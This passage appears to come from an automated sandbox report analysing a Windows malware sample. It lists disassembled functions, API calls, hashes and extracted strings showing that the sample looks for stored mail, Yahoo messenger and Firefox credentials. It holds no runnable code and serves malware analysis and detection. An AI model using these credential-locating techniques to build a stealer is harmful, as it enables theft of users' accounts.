                      • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                      APIs
                      • memset.MSVCRT ref: 0040810E
                        • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                        • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                      • LocalFree.KERNEL32(?,?,?,?,?,00000000,7686EB20,?), ref: 004081B9
                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                        • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                      • String ID: POP3_credentials$POP3_host$POP3_name
                      • API String ID: 524865279-2190619648
                      • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                      • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                      • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                      • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: ItemMenu$CountInfomemsetstrchr
                      • String ID: 0$6
                      • API String ID: 2300387033-3849865405
                      • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                      • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                      • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                      • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpystrlen$memsetsprintf
                      • String ID: %s (%s)
                      • API String ID: 3756086014-1363028141
                      • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                      • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                      • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                      • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: _mbscat$memsetsprintf
                      • String ID: %2.2X
                      • API String ID: 125969286-791839006
                      • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                      • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                      • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                      • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                      APIs
                        • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                      • ??2@YAPAXI@Z.MSVCRT ref: 004441C2
                      • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                        • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                        • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                        • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT ref: 00444075
                        • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                        • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                        • Part of subcall function 00444059: memcpy.MSVCRT ref: 004440EB
                        • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                      • ??3@YAXPAX@Z.MSVCRT ref: 004441FC
                      • CloseHandle.KERNEL32(?), ref: 00444206
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                      • String ID: ACD
                      • API String ID: 1886237854-620537770
                      • Opcode ID: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                      • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                      • Opcode Fuzzy Hash: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                      • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                      APIs
                      • memset.MSVCRT ref: 004091EC
                      • sprintf.MSVCRT ref: 00409201
                        • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                        • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                        • Part of subcall function 0040929C: _mbscpy.MSVCRT ref: 004092FC
                      • SetWindowTextA.USER32(?,?), ref: 00409228
                      • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                      • String ID: caption$dialog_%d
                      • API String ID: 2923679083-4161923789
                      • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                      • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                      • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                      • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                      APIs
                      Strings
                      • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                      • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                      • unknown error, xrefs: 004277B2
                      • abort due to ROLLBACK, xrefs: 00428781
                      • no such savepoint: %s, xrefs: 00426A02
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy
                      • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                      • API String ID: 3510742995-3035234601
                      • Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                      • Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
                      • Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                      • Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset
                      • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                      • API String ID: 2221118986-3608744896
                      • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                      • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
                      • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                      • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                      APIs
                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                      • memset.MSVCRT ref: 00410246
                      • memset.MSVCRT ref: 00410258
                        • Part of subcall function 004100CC: _mbscpy.MSVCRT ref: 004100F2
                      • memset.MSVCRT ref: 0041033F
                      • _mbscpy.MSVCRT ref: 00410364
                      • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset$_mbscpy$CloseHandleOpenProcess
                      • String ID:
                      • API String ID: 3974772901-0
                      • Opcode ID: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                      • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                      • Opcode Fuzzy Hash: 73ffa1b9b7589030d7e14d736cd79d790de15ef6361b0a20e82543b4428b0de8
                      • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                      APIs
                      • wcslen.MSVCRT ref: 0044406C
                      • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                      • strlen.MSVCRT ref: 004440D1
                        • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT ref: 00443507
                        • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                      • memcpy.MSVCRT ref: 004440EB
                      • ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                      • String ID:
                      • API String ID: 577244452-0
                      • Opcode ID: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                      • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                      • Opcode Fuzzy Hash: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                      • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                      APIs
                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                        • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                      • _strcmpi.MSVCRT ref: 00404518
                      • _strcmpi.MSVCRT ref: 00404536
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: _strcmpi$memcpystrlen
                      • String ID: imap$pop3$smtp
                      • API String ID: 2025310588-821077329
                      • Opcode ID: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                      • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                      • Opcode Fuzzy Hash: 508188f4cfb0bf5cabdc99a14187536ad4414849d830173f76bc96666e9cf368
                      • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                      APIs
                      • memset.MSVCRT ref: 0040C02D
                        • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                        • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                        • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                        • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                        • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                        • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                        • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                        • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407725
                        • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                        • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407743
                        • Part of subcall function 004074EA: _mbscpy.MSVCRT ref: 00407550
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                      • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                      • API String ID: 2726666094-3614832568
                      • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                      • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                      • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                      • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                      APIs
                      • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                      • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                      • OpenClipboard.USER32(?), ref: 0040C1B1
                      • GetLastError.KERNEL32 ref: 0040C1CA
                      • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                      • String ID:
                      • API String ID: 2014771361-0
                      • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                      • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                      • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                      • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                      APIs
                      • memcmp.MSVCRT ref: 00406151
                        • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
                        • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060CC
                        • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060E1
                      • memcmp.MSVCRT ref: 0040617C
                      • memcmp.MSVCRT ref: 004061A4
                      • memcpy.MSVCRT ref: 004061C1
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcmp$memcpy
                      • String ID: global-salt$password-check
                      • API String ID: 231171946-3927197501
                      • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                      • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                      • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                      • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                      APIs
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: ??3@
                      • String ID:
                      • API String ID: 613200358-0
                      • Opcode ID: 6ed48c83ccf18aed41f75d24fb527b0a1cda54e9eb8d05dcdcbff87325985d63
                      • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                      • Opcode Fuzzy Hash: 6ed48c83ccf18aed41f75d24fb527b0a1cda54e9eb8d05dcdcbff87325985d63
                      • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                      APIs
                      • GetClientRect.USER32(?,?), ref: 004016A3
                      • GetSystemMetrics.USER32(00000015), ref: 004016B1
                      • GetSystemMetrics.USER32(00000014), ref: 004016BD
                      • BeginPaint.USER32(?,?), ref: 004016D7
                      • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                      • EndPaint.USER32(?,?), ref: 004016F3
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                      • String ID:
                      • API String ID: 19018683-0
                      • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                      • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                      • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                      • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                      APIs
                      • memset.MSVCRT ref: 0040644F
                      • memcpy.MSVCRT ref: 00406462
                      • memcpy.MSVCRT ref: 00406475
                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                        • Part of subcall function 00404888: memcpy.MSVCRT ref: 004048FC
                        • Part of subcall function 00404888: memcpy.MSVCRT ref: 0040490E
                      • memcpy.MSVCRT ref: 004064B9
                      • memcpy.MSVCRT ref: 004064CC
                      • memcpy.MSVCRT ref: 004064F9
                      • memcpy.MSVCRT ref: 0040650E
                        • Part of subcall function 00406286: memcpy.MSVCRT ref: 004062B2
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy$memset
                      • String ID:
                      • API String ID: 438689982-0
                      • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                      • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                      • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                      • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                      APIs
                        • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                      • memset.MSVCRT ref: 0040330B
                      • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                      • strchr.MSVCRT ref: 0040335A
                        • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                      • strlen.MSVCRT ref: 0040339C
                        • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                      • String ID: Personalities
                      • API String ID: 2103853322-4287407858
                      • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                      • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                      • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                      • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                      APIs
                      • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                      • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                      • memcpy.MSVCRT ref: 004108C3
                      Strings
                      • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                      • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: FromStringUuid$memcpy
                      • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                      • API String ID: 2859077140-3316789007
                      • Opcode ID: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                      • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                      • Opcode Fuzzy Hash: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                      • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                      APIs
                      • memset.MSVCRT ref: 00444573
                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: CloseOpenQueryValuememset
                      • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                      • API String ID: 1830152886-1703613266
                      • Opcode ID: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                      • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                      • Opcode Fuzzy Hash: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                      • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memset
                      • String ID: H
                      • API String ID: 2221118986-2852464175
                      • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                      • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                      • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                      • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy
                      • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                      • API String ID: 3510742995-3170954634
                      • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                      • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                      • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                      • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpy$memset
                      • String ID: winWrite1$winWrite2
                      • API String ID: 438689982-3457389245
                      • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                      • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                      • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                      • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000017.00000002.1786776659.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_23_2_400000_wab.jbxd
                      Similarity
                      • API ID: memcpymemset
                      • String ID: winRead
                      • API String ID: 1297977491-2759563040
                      • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                      • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
